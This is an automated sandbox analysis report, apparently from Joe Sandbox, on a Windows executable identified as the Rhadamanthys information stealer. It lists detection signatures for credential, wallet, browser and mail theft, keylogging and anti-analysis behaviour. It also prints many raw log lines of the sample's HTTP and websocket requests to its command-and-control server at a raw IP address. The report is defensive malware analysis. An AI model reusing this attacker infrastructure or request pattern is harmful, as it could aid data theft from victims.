Windows Analysis Report
wdeeFKntav.exe

Overview

General Information

Sample name: wdeeFKntav.exe
renamed because original name is a hash value
Original sample name: e1bece7ba20dbb8100100f8cff2c415d.exe
Analysis ID: 1446715
MD5: e1bece7ba20dbb8100100f8cff2c415d
SHA1: 6ea8efc12ed24f00eb0f230dfec026a6816ba696
SHA256: 98942a0affa9721c90b097c2c6a9cd02959185526c3b7a44377a25b252a16fff
Tags: exe
Infos:

Detection

RHADAMANTHYS
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected RHADAMANTHYS Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Contains functionality to call native functions
Contains functionality to detect virtual machines (STR)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic

Classification

Name Description Attribution Blogpost URLs Link
Rhadamanthys According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search user.
  • Sandworm
 https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: wdeeFKntav.exe Avira: detected
Multi AV Scanner detection for submitted file
Source: wdeeFKntav.exe ReversingLabs: Detection: 76%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.9% probability
Machine Learning detection for sample
Source: wdeeFKntav.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F04FF7C CryptUnprotectData, 3_2_00007DF41F04FF7C
Uses 32bit PE files
Source: wdeeFKntav.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49699 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49717 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49718 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49719 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49720 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49722 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49723 version: TLS 1.2
Source: wdeeFKntav.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831L source: OpenWith.exe, 00000003.00000002.3331408408.0000025B14E9A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdb source: wdeeFKntav.exe, 00000000.00000003.2112932104.00000000046E0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2112870082.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115365389.0000000002D10000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115429018.0000000004E30000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdb source: wdeeFKntav.exe, 00000000.00000003.2113091379.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2113264458.00000000047E0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115786172.0000000004FD0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115566580.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: OpenWith.exe, 00000003.00000002.3331408408.0000025B14E9A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ntdll.pdb source: wdeeFKntav.exe, 00000000.00000003.2111775317.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2112323721.00000000047B0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2114700103.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2114865216.0000000004FA0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: wdeeFKntav.exe, 00000000.00000003.2112545924.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2112684749.0000000004760000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115217738.0000000004F50000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115079095.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: wdeeFKntav.exe, 00000000.00000003.2111775317.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2112323721.00000000047B0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2114700103.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2114865216.0000000004FA0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: wdeeFKntav.exe, 00000000.00000003.2112545924.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2112684749.0000000004760000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115217738.0000000004F50000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115079095.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdbUGP source: wdeeFKntav.exe, 00000000.00000003.2113091379.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2113264458.00000000047E0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115786172.0000000004FD0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115566580.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdbUGP source: wdeeFKntav.exe, 00000000.00000003.2112932104.00000000046E0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2112870082.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115365389.0000000002D10000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115429018.0000000004E30000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: OpenWith.exe, 00000003.00000002.3331408408.0000025B14E9A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdbf source: OpenWith.exe, 00000003.00000002.3331408408.0000025B14E9A000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F058E20 GetLogicalDriveStringsW, 3_2_00007DF41F058E20
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData\Local\Microsoft\InputPersonalization\TrainedDataStore Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData\Local\Microsoft\InputPersonalization Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData\Local Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData\Local\Microsoft Jump to behavior
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\System32\OpenWith.exe Code function: 4x nop then dec esp 3_2_0000025B14E20511
Source: C:\Windows\System32\OpenWith.exe Code function: 4x nop then dec esp 3_2_00007DF41F05BFA1
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: caec7ddf6889590d999d7ca1b76373b6
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brCache-Control: max-age=0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36If-Match: "ete6WHCQjxNcNjY1jEgGnY3tc9nSpnEcXroCoa+G1jzhT02yKm+Udo9y++Tli4waAsLCo0lRivK7ZSYZE/haMgBlbi1DSA=="Connection: close
Source: global traffic HTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: xU2b84xhXZbqQYI
Source: global traffic HTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: RAgFd01qjbFHl5s
Source: global traffic HTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: sW1tFC9u4h8HrYr
Source: global traffic HTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: M8ftLICEWZ7XZ6c
Source: global traffic HTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: Uu0iaFdbG5AryZb
Source: global traffic HTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: wmg987RLpbyqFSI
Source: global traffic HTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: Q3ZCdcjUNS1IbZW
Source: global traffic HTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: YpfXF0WYwZtHMSW
Source: global traffic HTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: gBYpLgo7UasXiuG
Source: global traffic HTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: TYefaI1F0MWWonG
Source: global traffic HTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: 2ku58F9dUSVrZha
Source: global traffic HTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: kvd5dMCTf5mbuop
Source: global traffic HTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: EbWxOS52DLQr2vF
Source: global traffic HTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: f5cmLiHAmSPq8o0
Source: global traffic HTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: oqscagi87YhXdh9
Source: global traffic HTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: IDbbhmNh0FLcLVU
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.232
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.232
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.232
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.232
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.232
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.232
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.232
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.232
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.232
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.232
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.232
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.232
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.232
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.232
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.232
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.232
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.232
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.232
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.232
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.232
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.232
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.232
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.232
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.232
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.232
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.232
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.232
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.232
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.232
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.232
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.232
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.232
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.232
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.232
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.232
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.232
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.232
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.232
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.232
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.232
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.232
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.232
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.232
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.232
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.232
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.232
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.232
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.232
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.232
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.232
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F081950 WSARecv, 3_2_00007DF41F081950
Source: global traffic HTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brCache-Control: max-age=0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36If-Match: "ete6WHCQjxNcNjY1jEgGnY3tc9nSpnEcXroCoa+G1jzhT02yKm+Udo9y++Tli4waAsLCo0lRivK7ZSYZE/haMgBlbi1DSA=="Connection: close
Source: global traffic HTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: xU2b84xhXZbqQYI
Source: global traffic HTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: RAgFd01qjbFHl5s
Source: global traffic HTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: sW1tFC9u4h8HrYr
Source: global traffic HTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: M8ftLICEWZ7XZ6c
Source: global traffic HTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: Uu0iaFdbG5AryZb
Source: global traffic HTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: wmg987RLpbyqFSI
Source: global traffic HTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: Q3ZCdcjUNS1IbZW
Source: global traffic HTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: YpfXF0WYwZtHMSW
Source: global traffic HTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: gBYpLgo7UasXiuG
